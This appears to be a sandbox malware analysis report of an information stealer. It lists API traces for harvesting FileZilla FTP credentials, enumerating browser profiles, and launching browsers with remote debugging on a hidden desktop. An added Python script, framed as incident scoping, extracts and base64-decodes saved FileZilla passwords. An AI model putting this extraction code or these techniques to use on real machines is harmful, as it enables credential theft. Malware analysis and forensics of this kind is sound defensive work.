                            • lstrlen.KERNEL32(013F8FF8), ref: 00133D6B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133D91
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00133D9C
                            • lstrlen.KERNEL32(013F9058), ref: 00133DBE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133DE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00133DEF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133E17
                            • lstrlen.KERNEL32(0015179C), ref: 00133E29
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133E48
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00133E54
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133E7A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00133EA7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00133EB2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133ED9
                            • lstrlen.KERNEL32(0015179C), ref: 00133EEB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133F0D
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00133F19
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133F42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133F71
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00133F7C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133FA3
                            • lstrlen.KERNEL32(0015179C), ref: 00133FB5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133FD7
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00133FE3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013400C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013403B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00134046
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013406D
                            • lstrlen.KERNEL32(0015179C), ref: 0013407F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001340A1
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 001340AD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001340D5
                            • lstrlen.KERNEL32(?), ref: 001340E9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134109
                            • lstrcat.KERNEL32(00000000,?), ref: 00134117
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134140
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013417F
                            • lstrlen.KERNEL32(013FD448), ref: 0013418E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001341B6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001341C1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001341EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013422E
                            • lstrcat.KERNEL32(00000000), ref: 0013423B
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00134439
                            • FindClose.KERNEL32(00000000), ref: 00134448
                            Strings
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 1006159827-1013718255
                            • Opcode ID: 78163236a9f7e822f981b9101e530cd209947d401bc5d20b71db183d8556bcef
                            • Instruction ID: fbd39d0559a015b8f952b3f98940c6e946dcebf8e774d8f5d4c52cf95a3bea5b
                            • Opcode Fuzzy Hash: 78163236a9f7e822f981b9101e530cd209947d401bc5d20b71db183d8556bcef
                            • Instruction Fuzzy Hash: 9E62B031911736EBCB22EF64EC49AAEB7BDAF54301F044129F815A7660DB34EE45CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00136AD5
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00136B08
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136B42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136B69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00136B74
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136B9D
                            • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00136BB7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136BD9
                            • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00136BE5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136C10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136C40
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00136C75
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00136CDD
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00136D0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 313953988-555421843
                            • Opcode ID: 626cb9f37a9d5bec0e9bd5bc1e9936369aeb8539b91c8e11f49f236f8c164fb8
                            • Instruction ID: 85a4ab8a1b7ae1a4332d030610dfcc0dea1e5f25c9e3307f765a10dfc82ce458
                            • Opcode Fuzzy Hash: 626cb9f37a9d5bec0e9bd5bc1e9936369aeb8539b91c8e11f49f236f8c164fb8
                            • Instruction Fuzzy Hash: F242A370A01326FBDB22EBB0EC49BAE7BB9AF15705F045525F801E72A1DB34D905CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 001260FF
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00126152
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00126185
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001261B5
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001261F0
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00126223
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00126233
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: fc9aff9a6e2e6654f7893953688510b0b218f037c786a579d78cf6c246f869a0
                            • Instruction ID: 005886008792f778c92d6d8f373372f608429aea6ec67ef0f161a4f3400b2fba
                            • Opcode Fuzzy Hash: fc9aff9a6e2e6654f7893953688510b0b218f037c786a579d78cf6c246f869a0
                            • Instruction Fuzzy Hash: C8527B71D00236ABCB21EF74EC49BAE77B9AF58305F144524F805AB2A5DB34ED12CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00136CDD
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00136D0D
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00136D3D
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00136D6F
                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00136D7C
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00136D83
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00136D9A
                            • lstrlen.KERNEL32(00000000), ref: 00136DA5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136DE8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136E0F
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 00136E22
                            • lstrlen.KERNEL32(00000000), ref: 00136E2D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136E70
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136E97
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00136EAA
                            • lstrlen.KERNEL32(00000000), ref: 00136EB5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136EF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136F1F
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00136F32
                            • lstrlen.KERNEL32(00000000), ref: 00136F41
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136F89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136FB1
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00136FD4
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00136FE8
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00137009
                            • LocalFree.KERNEL32(00000000), ref: 00137014
                            • lstrlen.KERNEL32(?), ref: 001370AE
                            • lstrlen.KERNEL32(?), ref: 001370C1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 2641759534-2314656281
                            • Opcode ID: 351ac65bd331e26d6b12b2b69478775dfc9f672a81c8f9a9aa73ef2b15daad58
                            • Instruction ID: 86c9c377c9586c4d4d46c4e082c3ec18fde51e8aa6e1f9d85714301e8cb1c9ac
                            • Opcode Fuzzy Hash: 351ac65bd331e26d6b12b2b69478775dfc9f672a81c8f9a9aa73ef2b15daad58
                            • Instruction Fuzzy Hash: 18029F70A11326FFCB21EBB0EC49BAE7BB9AF19705F145515F802E72A1DB34D90587A0
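The two traced functions above (path construction at 00136AD5 onward, tag search and base64 decode at 00136CDD onward) together describe how the sample harvests FileZilla's recent-server list: SHGetFolderPathA with CSIDL 0x28 (CSIDL_PROFILE) plus the fixed suffix \AppData\Roaming\FileZilla\recentservers.xml, StrStrA for the literals <Host>, <Port>, <User> and <Pass encoding="base64">, and a two-call CryptStringToBinaryA with dwFlags = 1 (CRYPT_STRING_BASE64) to decode the password before emitting the browser:/profile:/url:/login:/password: record. The script below is an added example for incident scoping, not code from the sample or from Joe Sandbox: given a victim's recentservers.xml it reproduces what that routine would have recovered. The sample XML is constructed here; the per-<Server> isolation, the treatment of a missing <Pass> element, and the host:port layout of the url: line are assumptions (the trace shows the tag literals and the labels, not the loop structure or the exact output layout).

```python
import base64
import re

# Tag literals exactly as they appear in the string list of the traced function.
HOST_TAG = "<Host>"
PORT_TAG = "<Port>"
USER_TAG = "<User>"
PASS_TAG = '<Pass encoding="base64">'

# Constructed sample in the layout FileZilla writes; not taken from the report.
# The second entry has no <Pass> (anonymous/keyfile logon) to show the edge case.
SAMPLE_RECENTSERVERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>bob</User>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def filezilla_target_path(profile_dir: str) -> str:
    """Path the sample builds: SHGetFolderPathA(CSIDL_PROFILE = 0x28) result
    followed by the fixed suffix seen in the lstrcat at 00136BE5."""
    return profile_dir.rstrip("\\") + r"\AppData\Roaming\FileZilla\recentservers.xml"


def _text_after_tag(text: str, open_tag: str, close_tag: str):
    """Mimic the StrStrA + lstrlen walk: locate open_tag, return what follows
    up to close_tag, or None when the tag is absent."""
    i = text.find(open_tag)
    if i < 0:
        return None
    i += len(open_tag)
    j = text.find(close_tag, i)
    return text[i:j] if j >= 0 else None


def extract_filezilla_recent(xml_text: str) -> list:
    """One record per <Server> element with the four fields the sample pulls.
    Isolating each <Server> block is an assumption made so that a missing
    <Pass> does not pick up the next server's password."""
    records = []
    for block in re.findall(r"<Server>(.*?)</Server>", xml_text, re.S):
        pass_b64 = _text_after_tag(block, PASS_TAG, "</Pass>")
        password = None
        if pass_b64 is not None:
            # Same transform as the two CryptStringToBinaryA calls with
            # dwFlags = 1 (CRYPT_STRING_BASE64): size query, then decode.
            password = base64.b64decode(pass_b64.strip()).decode("utf-8", "replace")
        records.append({
            "host": _text_after_tag(block, HOST_TAG, "</Host>"),
            "port": _text_after_tag(block, PORT_TAG, "</Port>"),
            "login": _text_after_tag(block, USER_TAG, "</User>"),
            "password": password,
        })
    return records


def format_like_sample(records: list) -> str:
    """Render records with the labels from the string list ("browser: FileZilla",
    "profile: null", "url: ", "login: ", "password: "). host:port for url: is
    an assumption; the trace shows only the label."""
    lines = []
    for r in records:
        lines.append("browser: FileZilla")
        lines.append("profile: null")
        lines.append(f"url: {r['host'] or ''}:{r['port'] or ''}")
        lines.append(f"login: {r['login'] or ''}")
        lines.append(f"password: {r['password'] or ''}")
        lines.append("")
    return "\n".join(lines)


if __name__ == "__main__":
    print(filezilla_target_path(r"C:\Users\victim"))
    print(format_like_sample(extract_filezilla_recent(SAMPLE_RECENTSERVERS_XML)))
```

For a real case, read the victim's recentservers.xml (and sitemanager.xml, which uses the same Pass element and is not covered by this trace) from a forensic image and pass its text to extract_filezilla_recent; every record with a non-empty password should be treated as a credential the stealer had in plaintext, since FileZilla's base64 encoding is not encryption.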
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012DBD3
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012DC1E
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012DC5F
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012DC8F
                            • FindFirstFileA.KERNEL32(?,?), ref: 0012DCA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindFirst
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 157892242-726946144
                            • Opcode ID: f925cea8f8f17e8af516d026339d0390d3ce3de14993b10bb2325e58346ba722
                            • Instruction ID: b6194a03241a2356792a763d7b8173db8ea584fd036354051c653165eab6634e
                            • Opcode Fuzzy Hash: f925cea8f8f17e8af516d026339d0390d3ce3de14993b10bb2325e58346ba722
                            • Instruction Fuzzy Hash: E0B2AD70A013259FCF24EF64E845B9E77F4BF58314F188569E809AB2A1DB30EC55CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00134CB1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134CD4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00134CDF
                            • lstrlen.KERNEL32(00154CAC), ref: 00134CEA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134D07
                            • lstrcat.KERNEL32(00000000,00154CAC), ref: 00134D13
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134D3E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00134D5A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: prefs.js
                            • API String ID: 2567437900-3783873740
                            • Opcode ID: e87dc76ed010d85c4bf6a9497d27bc1333b712c933b322b034a1c20338040f30
                            • Instruction ID: 375efce9525021a7b7bb4b508534bc2c0aec79f1e4ec2900bd8b0a9ede8dea05
                            • Opcode Fuzzy Hash: e87dc76ed010d85c4bf6a9497d27bc1333b712c933b322b034a1c20338040f30
                            • Instruction Fuzzy Hash: 06923E70A01B11DFDB25CF29D949B6AB7F6AF44715F1980ADE8099B2A1D731EC42CB80
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001313E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131404
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013140F
                            • lstrlen.KERNEL32(00154CAC), ref: 0013141A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131437
                            • lstrcat.KERNEL32(00000000,00154CAC), ref: 00131443
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013146E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0013148A
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 001314AC
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 001314C6
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001314FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131527
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00131532
                            • lstrlen.KERNEL32(0015179C), ref: 0013153D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013155A
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00131566
                            • lstrlen.KERNEL32(?), ref: 00131573
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131593
                            • lstrcat.KERNEL32(00000000,?), ref: 001315A1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001315CA
                            • StrCmpCA.SHLWAPI(?,013FD388), ref: 001315F3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131634
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013165D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131685
                            • StrCmpCA.SHLWAPI(?,013FD758), ref: 001316A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 001316E3
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013170C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131734
                            • StrCmpCA.SHLWAPI(?,013FD490), ref: 00131752
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131783
                            • lstrcpy.KERNEL32(00000000,?), ref: 001317AC
                            • lstrcpy.KERNEL32(00000000,?), ref: 001317D5
                            • StrCmpCA.SHLWAPI(?,013FD538), ref: 00131803
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131844
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013186D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131895
                            • lstrcpy.KERNEL32(00000000,?), ref: 001318E6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013190E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131945
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0013196C
                            • FindClose.KERNEL32(00000000), ref: 0013197B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: 64b576881a49cf480b9a4e0319e37003fb4b1995864d709d289a65b45ed8dc17
                            • Instruction ID: b8daf528e34079656bcf7272856d547e7b3d8c493e165cbbf2604895adf13536
                            • Opcode Fuzzy Hash: 64b576881a49cf480b9a4e0319e37003fb4b1995864d709d289a65b45ed8dc17
                            • Instruction Fuzzy Hash: A112B271A11326EBCB25EF78EC8AAAE77B8AF54305F044528F846E7250DB34DD45CB90
                            APIs
                            • wsprintfA.USER32 ref: 0013CDEC
                            • FindFirstFileA.KERNEL32(?,?), ref: 0013CE03
                            • lstrcat.KERNEL32(?,?), ref: 0013CE4F
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 0013CE61
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 0013CE7B
                            • wsprintfA.USER32 ref: 0013CEA0
                            • PathMatchSpecA.SHLWAPI(?,013F8FD8), ref: 0013CED2
                            • CoInitialize.OLE32(00000000), ref: 0013CEDE
                              • Part of subcall function 0013CCD0: CoCreateInstance.COMBASE(0014B118,00000000,00000001,0014B108,?), ref: 0013CCF6
                              • Part of subcall function 0013CCD0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0013CD36
                              • Part of subcall function 0013CCD0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0013CDB9
                            • CoUninitialize.COMBASE ref: 0013CEF9
                            • lstrcat.KERNEL32(?,?), ref: 0013CF1E
                            • lstrlen.KERNEL32(?), ref: 0013CF2B
                            • StrCmpCA.SHLWAPI(?,0014CFF4), ref: 0013CF45
                            • wsprintfA.USER32 ref: 0013CF6D
                            • wsprintfA.USER32 ref: 0013CF8C
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 0013CFA0
                            • wsprintfA.USER32 ref: 0013CFC8
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0013CFE1
                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0013D000
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 0013D018
                            • CloseHandle.KERNEL32(00000000), ref: 0013D023
                            • CloseHandle.KERNEL32(00000000), ref: 0013D02F
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0013D044
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013D084
                            • FindNextFileA.KERNEL32(?,?), ref: 0013D17D
                            • FindClose.KERNEL32(?), ref: 0013D18F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                            • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 3860919712-2388001722
                            • Opcode ID: 9725f802c98a61060da8eada385264544e29d0682914b36c1c41e9f4a7771711
                            • Instruction ID: 3c6e45cf60bdba038042d8e8b50f497ed3de4e2190304fbca554f44897b267db
                            • Opcode Fuzzy Hash: 9725f802c98a61060da8eada385264544e29d0682914b36c1c41e9f4a7771711
                            • Instruction Fuzzy Hash: B9C18171900319AFCB25DF64EC45AEE77BDAF58701F004599F909A7290EB30AA85CF90
                            APIs
                            • memset.MSVCRT ref: 00129790
                            • lstrcat.KERNEL32(?,?), ref: 001297A0
                            • lstrcat.KERNEL32(?,?), ref: 001297B1
                            • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 001297C3
                            • memset.MSVCRT ref: 001297D7
                              • Part of subcall function 00144040: lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00144075
                              • Part of subcall function 00144040: lstrcpy.KERNEL32(00000000,013FA5B0), ref: 0014409F
                              • Part of subcall function 00144040: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0012134E,?,0000001A), ref: 001440A9
                            • wsprintfA.USER32 ref: 00129806
                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00129827
                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00129844
                              • Part of subcall function 001448B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 001448C9
                              • Part of subcall function 001448B0: Process32First.KERNEL32(00000000,00000128), ref: 001448D9
                              • Part of subcall function 001448B0: Process32Next.KERNEL32(00000000,00000128), ref: 001448EB
                              • Part of subcall function 001448B0: StrCmpCA.SHLWAPI(?,?), ref: 001448FD
                              • Part of subcall function 001448B0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00144912
                              • Part of subcall function 001448B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00144921
                              • Part of subcall function 001448B0: CloseHandle.KERNEL32(00000000), ref: 00144928
                              • Part of subcall function 001448B0: Process32Next.KERNEL32(00000000,00000128), ref: 00144936
                              • Part of subcall function 001448B0: CloseHandle.KERNEL32(00000000), ref: 00144941
                            • memset.MSVCRT ref: 00129862
                            • lstrcat.KERNEL32(00000000,?), ref: 00129878
                            • lstrcat.KERNEL32(00000000,?), ref: 00129889
                            • lstrcat.KERNEL32(00000000,00154B68), ref: 0012989B
                            • memset.MSVCRT ref: 001298AF
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 001298D4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00129903
                            • StrStrA.SHLWAPI(00000000,013FE328), ref: 00129919
                            • lstrcpyn.KERNEL32(003593D0,00000000,00000000), ref: 00129938
                            • lstrlen.KERNEL32(?), ref: 0012994B
                            • wsprintfA.USER32 ref: 0012995B
                            • lstrcpy.KERNEL32(?,00000000), ref: 00129971
                            • memset.MSVCRT ref: 00129986
                            • Sleep.KERNEL32(00001388), ref: 001299E7
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121557
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121579
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                              • Part of subcall function 001292B0: strlen.MSVCRT ref: 001292E1
                              • Part of subcall function 001292B0: strlen.MSVCRT ref: 001292FA
                              • Part of subcall function 001292B0: strlen.MSVCRT ref: 00129399
                              • Part of subcall function 001292B0: strlen.MSVCRT ref: 001293E6
                              • Part of subcall function 00144950: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00144969
                              • Part of subcall function 00144950: Process32First.KERNEL32(00000000,00000128), ref: 00144979
                              • Part of subcall function 00144950: Process32Next.KERNEL32(00000000,00000128), ref: 0014498B
                              • Part of subcall function 00144950: OpenProcess.KERNEL32(00000001,00000000,?), ref: 001449AC
                              • Part of subcall function 00144950: TerminateProcess.KERNEL32(00000000,00000000), ref: 001449BB
                              • Part of subcall function 00144950: CloseHandle.KERNEL32(00000000), ref: 001449C2
                              • Part of subcall function 00144950: Process32Next.KERNEL32(00000000,00000128), ref: 001449D0
                              • Part of subcall function 00144950: CloseHandle.KERNEL32(00000000), ref: 001449DB
                            • CloseDesktop.USER32(?), ref: 00129A1C
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                            • API String ID: 2040986984-1862457068
                            • Opcode ID: 3bba47113ef41b80570d8f62e9382db3074afefc52405c1d9ef3f7fea0c01f45
                            • Instruction ID: f20a08439b419d623ef2dffb239a339db4b01fadaa5bf58112922c67858a3020
                            • Opcode Fuzzy Hash: 3bba47113ef41b80570d8f62e9382db3074afefc52405c1d9ef3f7fea0c01f45
                            • Instruction Fuzzy Hash: 4E916371A00318EFDB11DFA4EC46FDE77B8AF58701F104599F609AB191DB70AA54CBA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001313E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131404
